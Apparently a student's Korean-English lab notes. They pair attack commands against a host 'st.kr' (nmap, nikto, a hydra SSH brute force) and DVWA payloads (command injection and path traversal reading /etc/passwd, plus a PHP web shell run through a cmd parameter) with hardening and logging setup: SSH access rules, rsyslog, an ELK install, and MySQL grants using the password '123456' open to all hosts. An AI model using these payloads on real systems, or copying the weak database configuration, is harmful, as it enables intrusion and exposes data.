공격
ping st.kr
nslookup st.kr
traceroute st.kr
nmap -v -sS -O st.kr 
dnsenum st.kr
nikto -h st.kr
hydra -L user.txt -P passwd.txt st.kr ssh


시스템 사용자를 찾아라
kali > ssh 125.246.95.152

dvwa
command injection
; cat /etc/passwd
file inclusion ?page=../../../../../etc/passwd
file upload
hackable/uploads/attack.php
?php
        $cmd = $_GET['cmd'];
        $result = system($cmd);

        echo "
";
        echo "
";
        echo $result;
?

hackable/uploads/attack.php?cmd=cat /etc/passwd

서버 관리자만 접근가능하게 (ssh접근 차단)
/etc/hosts.allow sshd : 192.168.0.3
/etc/hosts.deny ALL : ALL
ssh 번호를 변경하기
/etc/ssh/sshd_config

/etc/rsyslog.conf
provides tcp
module(load="imtcp")
input(type="imtcp" port="514")
$AllowedSender TCP, 127.0.0.1 10.0.2.0/24 *.st.kr

서버
/etc/rsyslog.d/50-default.conf
Target="10.0.2.3"

sudo apt -y install default-jre
sudo apt -y install default-jdk
sudo apt -y install nginx

curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch |sudo gpg --dearmor -o /usr/share/keyrings/elastic.gpg
echo "deb [signed-by=/usr/share/keyrings/elastic.gpg] https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt update
sudo apt -y install elasticsearch
/etc/elasticsearch/elasticsearch.yml

sudo systemctl start elasticsearch
sudo systemctl enable elasticsearch
curl -X GET "localhost:9200"

sudo apt -y install kibana
sudo systemctl start kibana
sudo systemctl enable kibana
sudo apt -y install logstash


select FromHost,Message from SystemEvents limit 0, 10;

mysql 외부 접근 허용하기
mysql
CREATE USER 'rsyslog'@'192.168.0.3' IDENTIFIED BY '123456';
GRANT ALL ON Syslog.* TO 'rsyslog'@'192.168.0.3';
FLUSH PRIVILEGES;

CREATE USER 'rsyslog'@'%' IDENTIFIED BY '123456';
GRANT ALL ON Syslog.* TO 'rsyslog'@'%';
FLUSH PRIVILEGES;

/etc/mysql/mariadb.conf.d/50-server.cnf 수정
bind-address = 0.0.0.0